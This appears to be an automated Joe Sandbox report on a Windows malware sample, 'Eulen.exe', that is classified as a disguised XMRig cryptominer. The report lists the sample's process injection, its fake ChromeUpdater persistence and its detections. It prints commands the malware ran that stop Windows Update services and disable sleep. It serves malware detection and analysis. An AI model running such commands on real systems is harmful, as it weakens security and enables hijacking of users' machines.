          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00007FF647341C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,14_2_00007FF647341C64
          Source: C:\Windows\System32\winlogon.exeCode function: 19_2_000002E991757A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,19_2_000002E991757A40

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          11
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          2
          Disable or Modify Tools
          2
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter
          11
          Windows Service
          11
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          LSASS Memory1
          File and Directory Discovery
          Remote Desktop Protocol2
          Credential API Hooking
          Junk DataExfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution
          Logon Script (Windows)1
          Access Token Manipulation
          1
          Obfuscated Files or Information
          Security Account Manager222
          System Information Discovery
          SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell
          Login Hook11
          Windows Service
          1
          Install Root Certificate
          NTDS621
          Security Software Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script813
          Process Injection
          11
          DLL Side-Loading
          LSA Secrets2
          Process Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          File Deletion
          Cached Domain Credentials121
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Masquerading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron121
          Virtualization/Sandbox Evasion
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task813
          Process Injection
          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories
          GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1551907 Sample: Eulen.exe Startdate: 08/11/2024 Architecture: WINDOWS Score: 100 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for dropped file 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 20 other signatures 2->64 8 Eulen.exe 2 2->8         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 3 other processes 2->16 process3 file4 50 C:\Users\user\AppData\...\auqpbnqlvfdv.tmp, PE32+ 8->50 dropped 52 C:\Program Filesbehaviorgraphoogle\...\ChromeUpdater.exe, PE32+ 8->52 dropped 76 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->76 78 Suspicious powershell command line found 8->78 80 Query firmware table information (likely to detect VMs) 8->80 90 10 other signatures 8->90 18 dialer.exe 1 8->18         started        82 Uses powercfg.exe to modify the power settings 12->82 84 Stops critical windows services 12->84 86 Modifies power options to not sleep / hibernate 12->86 21 conhost.exe 12->21         started        31 5 other processes 12->31 23 conhost.exe 14->23         started        25 powercfg.exe 1 14->25         started        33 3 other processes 14->33 88 Loading BitLocker PowerShell Module 16->88 27 conhost.exe 16->27         started        29 conhost.exe 16->29         started        35 2 other processes 16->35 signatures5 process6 signatures7 66 Injects code into the Windows Explorer (explorer.exe) 18->66 68 Contains functionality to inject code into remote processes 18->68 70 Writes to foreign memory regions 18->70 72 4 other signatures 18->72 37 svchost.exe 18->37 injected 39 lsass.exe 18->39 injected 42 winlogon.exe 18->42 injected 44 22 other processes 18->44 process8 signatures9 46 ChromeUpdater.exe 37->46         started        74 Installs new ROOT certificates 39->74 process10 file11 54 C:\Windows\Temp\auqpbnqlvfdv.tmp, PE32+ 46->54 dropped 56 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 46->56 dropped 92 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 46->92 94 Query firmware table information (likely to detect VMs) 46->94 96 Protects its processes via BreakOnTermination flag 46->96 98 5 other signatures 46->98 signatures12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Eulen.exe16%ReversingLabs
          Eulen.exe100%AviraHEUR/AGEN.1325655
          SourceDetectionScannerLabelLink
          C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe100%AviraHEUR/AGEN.1325655
          C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp100%AviraHEUR/AGEN.1362795
          C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp100%Joe Sandbox ML
          C:\Windows\Temp\auqpbnqlvfdv.tmp100%Joe Sandbox ML
          C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe16%ReversingLabs
          C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
          C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp92%ReversingLabsWin64.Trojan.Heracles
          C:\Windows\Temp\auqpbnqlvfdv.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Licensepowershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.micpowershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1593767050.0000015D90070000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.micft.cMicRosofpowershell.exe, 0000000F.00000002.1601184621.0000015DE9224000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/pscore68powershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000016.00000000.1538245397.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2688295152.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000016.00000002.2687009185.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.1538183577.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.microsvchost.exe, 00000020.00000002.2696354530.000001486A5B0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1566783925.0000015D80001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.1566783925.0000015D8022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          No contacted IP infos
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1551907
                                                          Start date and time:2024-11-08 11:27:27 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 10m 48s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:30
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:23
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Eulen.exe
                                                          Detection:MAL
                                                          Classification:mal100.spyw.evad.mine.winEXE@50/71@0/0
                                                          EGA Information:
                                                          • Successful, ratio: 89.5%
                                                          HCA Information:
                                                          • Successful, ratio: 66%
                                                          • Number of executed functions: 81
                                                          • Number of non-executed functions: 390
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, xmr-us-east1.nanopool.org, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 8116 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: Eulen.exe
                                                          TimeTypeDescription
                                                          05:28:29API Interceptor1x Sleep call for process: Eulen.exe modified
                                                          05:28:31API Interceptor41x Sleep call for process: powershell.exe modified
                                                          05:28:54API Interceptor1x Sleep call for process: ChromeUpdater.exe modified
                                                          05:29:06API Interceptor322506x Sleep call for process: winlogon.exe modified
                                                          05:29:08API Interceptor235846x Sleep call for process: lsass.exe modified
                                                          05:29:08API Interceptor4471x Sleep call for process: svchost.exe modified
                                                          05:29:11API Interceptor288856x Sleep call for process: dwm.exe modified
                                                          11:28:39Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Program Files\Google\Libs\WR64.sysU9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                            file.exeGet hashmaliciousAmadey, XmrigBrowse
                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                                        ICBM.exeGet hashmaliciousXmrigBrowse
                                                                          ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                              Process:C:\Users\user\Desktop\Eulen.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):44977152
                                                                              Entropy (8bit):7.944524618338768
                                                                              Encrypted:false
                                                                              SSDEEP:786432:0k1E58Eufbqc0mWvEjgYsvdT/sG8r+KMbDna+ioiYL:07O7DqJ5EjgYu38yfbDHL
                                                                              MD5:F8DD965FE02F49C93F22972470D480B3
                                                                              SHA1:859B8399768955C861037B246CA458E847041622
                                                                              SHA-256:ACBAE9FB2FE0B90EB94C09BC11726A544FFD22FB5ED20F4477227979E88FDC7D
                                                                              SHA-512:C1CDA92F3F83B50CCF8917920081F89675735EDDF2020E1AD3B7429A46268C8893DB7B27C80DAA673F29FFD4B2523220D3852D1C76883AE1E7E35645B11588F4
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 16%
                                                                              Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....A-g...............&........&...Bp........@.............................P............`... .............................................P...d....@......p...L;...........0..............................0MB.(.....................?.h............................text...............................`..`.data...@...........................@....rdata...>...p......................@..@.pdata..<...........................@..@.xdata..L..........................@..@.bss.....%...............................idata..4...........................@....CRT....`.... ......................@....tls.........0......................@....@yC.........@......................@..@.j]_.........P...................... ..`.+.:....(.....?.....................@....D6u.....6....?..8..................`..h.reloc.......0.......F..............@..@.rsrc........@.......H..............@..@........
                                                                              Process:C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
